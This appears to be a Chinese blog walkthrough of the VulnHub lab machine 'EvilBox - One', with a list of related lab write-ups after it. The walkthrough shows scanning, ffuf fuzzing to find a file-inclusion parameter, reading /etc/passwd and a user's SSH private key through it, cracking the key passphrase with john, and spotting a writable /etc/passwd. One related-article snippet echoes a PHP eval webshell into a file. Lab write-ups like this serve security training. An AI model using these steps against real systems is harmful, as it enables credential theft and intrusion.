首页 > 其他分享 >vulnhub靶场:EvilBox - One

vulnhub靶场:EvilBox - One

时间:2023-07-01 12:45:27浏览次数:37  
标签:http 6.94 rsa EvilBox 172.88 ssh 靶场 id vulnhub

下载地址:https://www.vulnhub.com/entry/evilbox-one,736/

kali:172.88.6.144

靶场:172.88.6.94

 

nmap -T4 -sV -P -A 172.88.6.94

 

 用 dirb http://172.88.6.94 和 dirsearch -u http://172.88.6.94/  发现类似的网址

 

 

dirb http://172.88.6.94/secret/ -X .php,.xml,.html   似乎没啥有用的信息

 

ffuf -c -r -u 'http://172.88.6.94/secret/evil.php?FUZZ=/etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt -fs 0

 

 整理之后发现这个

 view-source:http://172.88.6.94/secret/evil.php?command=/home/mowree/.ssh/id_rsa

 把这一串ssh 私钥复制到kaili 

ssh [email protected] -i id_rsa ,发现需要密码

ssh2john查看kali有没有John,然后ssh2john id_rsa > tmp,执行john tmp --wordlist=/usr/share/wordlists/rockyou.txt,密码出来了unicorn

 ssh [email protected] -i id_rsa

 find / -writable 2>/dev/null | grep -v proc 发现 /etc/passwd有写入权限

 

知识点:文件包含漏洞、ffuf爆破参数名、ssh2john和john爆破密码、ssh私匙登录、/etc/passwd提权

 

标签:http,6.94,rsa,EvilBox,172.88,ssh,靶场,id,vulnhub
From: https://www.cnblogs.com/ndy619/p/17519123.html

相关文章

  • vulnhub靶场:Deathnote
    靶场地址:Deathnote:1~VulnHubKali:172.88.6.144靶场:172.88.6.92arp-scan-l nmap-T4-sV-P-A172.88.6.92  访问web服务时发现会自动跳转到:http://deathnote.vuln/wordpress/页面,但是显示404,想着应该是未配置dns的问题。那就配置下dns信息,win:打开C:\Windows\Syst......
  • vulnhub靶场:doubletrouble
    靶场地址:doubletrouble:1~VulnHubkali:172.88.6.144靶场:172.88.6.89靶场2:172.88.6.91arp-scan-l  nmap-A-sV-T4-p-172.88.6.89 访问ip 使用dirsearch对目标站点进行Web目录爬取dirsearch-uhttp://172.88.6.89/-e*   将图片下载好,放到kali中,自......
  • VulnHub-DC-7渗透流程
    DC-7kali:192.168.157.131靶机:192.168.157.151信息收集nmap-sV-A-p-192.168.157.151虽然有robots.txt等敏感文件泄露但是用处不大,但在网页底部有@dc7user搜索一番,在github找到了他的项目,在config.php内得到了登录用户与密码$username="dc7user";$password="Md......
  • Vulnhub: DarkHole:1靶机
    kali:192.168.111.111靶机:192.168.111.130信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.130访问目标web网站,注册用户注册时尝试注册用户名为admin的用户,发现存在该用户进入用户后台,利用burp抓包越权修改其他用户的密码admin用户密码......
  • VulnHub_DC-6渗透流程
    DC-6kali:192.168.157.131靶机:192.168.157.150修改host文件,添加192.168.157.150wordy不然解析不了域名信息收集发现是WordPress5.1.1,探测一下用户,使用wpscan对其用户进行枚举wpscan--urlhttp://wordy/--enumerateu另存为user.txt扫一下目录找到登录界面访问http......
  • vulnhub靶场:Thales
    靶场地址:泰雷兹:1~VulnHubkali:172.88.6.144靶场:172.88.6.81 nmap172.88.6.0/24 nmap-T4-sV-P -A172.88.6.81 访问http://172.88.6.81:8080/,发现是tomcat页面,登录需要账户,所以使用msf爆破下 msfconsolesearchtomcat  useauxiliary/scanner/http/t......
  • xss漏洞攻击复现(xssgame靶场通关)
     这篇文章简单的介绍下xssgame的通关方法,从名字可以看出,xssgame就是针对xss攻击进行专门的漏洞复现,由易到难。 链接:https://pan.baidu.com/s/1F9I7iBdu7MPLLvegM5kAQg 提取码:469c 这是xssgame的安装包,将它放到phpstudy/WWW文件夹下访问即可 第一关 这一关没有任......
  • vulnhun靶场:Red.ova
    靶场下载:Red:1~VulnHubkali:172.88.6.144靶场:172.88.6.70 靶场页面是这个,第一次没有找到ip,使用桥接找到了nmap172.88.6.0/24 访问ip    找了很久没有找到有用的信息,在查看代码的时候发现了这个,直接打不开,在本地添加host   直接打开代码没有发现什......
  • Vulnhub_Broken_WP
    前言靶机下载地址-->https://www.vulnhub.com/靶机探测nmap-sn192.168.20.0/24192.168.20.140是新出现的ip详细信息扫描nmap-A-p-192.168.20.140这里可以发现nmap已经扫到了一些网站目录,一个说明文件和图片漏洞扫描nmapnmap-p22,80--script=vuln192.168.20.......
  • vulnhun靶场:jangow-01-1.0.1
    kali:172.88.6.144靶场:172.88.6.64靶场地址:Jangow:1.0.1~VulnHub 访问ip  点击右上角的buscar   写入一句话:echo'<?phpeval($_POST['shell']);?>'>upfine.php  在wordpress里面有两个文件,分别是config.php、index.html 在/var/www/html/.back......